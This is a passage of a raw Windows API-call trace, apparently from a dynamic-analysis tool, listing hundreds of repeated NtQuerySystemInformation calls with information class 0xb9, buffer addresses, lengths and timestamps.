NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.572] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd870, Length=0x20, ResultLength=0x0) [0271.572] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd7f0, Length=0x20, ResultLength=0x0) [0271.572] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.572] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd7f0, Length=0x20, ResultLength=0x0) [0271.572] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.572] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd7f0, Length=0x20, ResultLength=0x0) [0271.572] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.572] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.572] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.572] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfda40, Length=0x20, ResultLength=0x0) [0271.573] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.573] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.573] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdad0, Length=0x38, ResultLength=0x0) [0271.573] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd960, Length=0x20, ResultLength=0x0) [0271.573] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd8e0, Length=0x20, ResultLength=0x0) [0271.573] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.573] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd8e0, Length=0x20, ResultLength=0x0) [0271.573] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.573] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd8e0, Length=0x20, ResultLength=0x0) [0271.573] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.573] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.573] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.573] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.573] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdad0, Length=0x38, ResultLength=0x0) [0271.574] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd960, Length=0x20, ResultLength=0x0) [0271.574] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd8e0, Length=0x20, ResultLength=0x0) [0271.574] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.574] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd8e0, Length=0x20, ResultLength=0x0) [0271.574] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.574] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd8e0, Length=0x20, ResultLength=0x0) [0271.574] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.574] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.574] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.574] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.574] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdad0, Length=0x38, ResultLength=0x0) [0271.574] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd960, Length=0x20, ResultLength=0x0) [0271.574] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd8f0, Length=0x20, ResultLength=0x0) [0271.575] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.575] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.575] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.575] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd8f0, Length=0x20, ResultLength=0x0) [0271.575] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.575] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.575] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.575] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.575] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.575] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdbf8, Length=0x58, ResultLength=0x0) [0271.575] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdac0, Length=0x58, ResultLength=0x0) [0271.575] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.575] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd9e0, Length=0x38, ResultLength=0x0) [0271.578] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.578] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd810, Length=0x28, ResultLength=0x0) [0271.578] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.578] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.578] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd810, Length=0x28, ResultLength=0x0) [0271.578] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.578] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.578] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd810, Length=0x28, ResultLength=0x0) [0271.578] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.578] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.653] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd810, Length=0x28, ResultLength=0x0) [0271.653] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.653] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.653] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd880, Length=0x28, ResultLength=0x0) [0271.653] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.653] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.653] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd9e0, Length=0x38, ResultLength=0x0) [0271.653] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.653] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd900, Length=0x28, ResultLength=0x0) [0271.655] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.655] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.655] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.655] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.655] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.656] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd900, Length=0x28, ResultLength=0x0) [0271.656] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.656] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.656] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd9e0, Length=0x38, ResultLength=0x0) [0271.656] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd860, Length=0x20, ResultLength=0x0) [0271.656] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd7e0, Length=0x20, ResultLength=0x0) [0271.656] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.656] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd7e0, Length=0x20, ResultLength=0x0) [0271.656] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.656] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd7e0, Length=0x20, ResultLength=0x0) [0271.656] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.656] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.656] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.656] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.656] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd9e0, Length=0x38, ResultLength=0x0) [0271.656] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd860, Length=0x20, ResultLength=0x0) [0271.657] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd7f0, Length=0x20, ResultLength=0x0) [0271.657] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.657] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.657] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.657] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd7f0, Length=0x20, ResultLength=0x0) [0271.657] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.657] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.658] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.658] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.658] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.658] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdac0, Length=0x58, ResultLength=0x0) [0271.658] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.658] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd9e0, Length=0x38, ResultLength=0x0) [0271.660] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.660] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd810, Length=0x28, ResultLength=0x0) [0271.660] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.660] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.660] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd810, Length=0x28, ResultLength=0x0) [0271.660] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.660] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.660] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd810, Length=0x28, ResultLength=0x0) [0271.660] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.660] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.660] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd810, Length=0x28, ResultLength=0x0) [0271.660] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.660] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.660] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd880, Length=0x28, ResultLength=0x0) [0271.661] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.661] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.661] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd9e0, Length=0x38, ResultLength=0x0) [0271.661] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.661] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd900, Length=0x28, ResultLength=0x0) [0271.663] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.663] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.663] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.664] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.664] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.664] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd900, Length=0x28, ResultLength=0x0) [0271.664] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd7a0, Length=0x20, ResultLength=0x0) [0271.664] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd720, Length=0x20, ResultLength=0x0) [0271.664] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.664] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd720, Length=0x20, ResultLength=0x0) [0271.664] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.664] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd720, Length=0x20, ResultLength=0x0) [0271.664] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.664] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.664] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.664] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.664] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.664] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd9e0, Length=0x38, ResultLength=0x0) [0271.664] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.664] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd9e0, Length=0x38, ResultLength=0x0) [0271.665] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd860, Length=0x20, ResultLength=0x0) [0271.665] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd7f0, Length=0x20, ResultLength=0x0) [0271.665] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.665] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.665] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.665] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd7f0, Length=0x20, ResultLength=0x0) [0271.665] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.665] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.665] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.665] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.665] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.665] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdac0, Length=0x58, ResultLength=0x0) [0271.665] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.665] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd9e0, Length=0x38, ResultLength=0x0) [0271.667] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.667] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd810, Length=0x28, ResultLength=0x0) [0271.667] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.667] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.667] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd810, Length=0x28, ResultLength=0x0) [0271.667] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.667] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.668] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd810, Length=0x28, ResultLength=0x0) [0271.668] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.668] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.668] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd810, Length=0x28, ResultLength=0x0) [0271.668] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.668] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.668] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd880, Length=0x28, ResultLength=0x0) [0271.668] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.668] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.668] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd9e0, Length=0x38, ResultLength=0x0) [0271.668] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.668] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd900, Length=0x28, ResultLength=0x0) [0271.670] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.670] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.671] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.671] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.671] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.671] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd900, Length=0x28, ResultLength=0x0) [0271.671] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.671] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.671] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd9e0, Length=0x38, ResultLength=0x0) [0271.671] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd860, Length=0x20, ResultLength=0x0) [0271.671] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd7e0, Length=0x20, ResultLength=0x0) [0271.671] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.671] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd7e0, Length=0x20, ResultLength=0x0) [0271.671] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.671] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd7e0, Length=0x20, ResultLength=0x0) [0271.671] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.671] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.672] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.672] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.672] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd9e0, Length=0x38, ResultLength=0x0) [0271.672] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd860, Length=0x20, ResultLength=0x0) [0271.672] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd7f0, Length=0x20, ResultLength=0x0) [0271.672] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.672] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.672] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.672] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd7f0, Length=0x20, ResultLength=0x0) [0271.672] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.672] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.673] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.673] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.673] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.673] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdac0, Length=0x58, ResultLength=0x0) [0271.673] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.673] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd9a0, Length=0x38, ResultLength=0x0) [0271.675] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.675] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.677] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.677] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.677] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd7e0, Length=0x28, ResultLength=0x0) [0271.677] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.677] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.677] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd7e0, Length=0x28, ResultLength=0x0) [0271.677] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.677] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.677] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd7e0, Length=0x28, ResultLength=0x0) [0271.677] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.677] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.678] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd7e0, Length=0x28, ResultLength=0x0) [0271.678] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.678] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.678] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd850, Length=0x28, ResultLength=0x0) [0271.678] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.678] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.678] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd9a0, Length=0x38, ResultLength=0x0) [0271.678] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.678] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd9a0, Length=0x38, ResultLength=0x0) [0271.678] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.678] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd8d0, Length=0x28, ResultLength=0x0) [0271.680] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.680] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.680] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.680] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.680] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.681] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd8d0, Length=0x28, ResultLength=0x0) [0271.681] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.681] 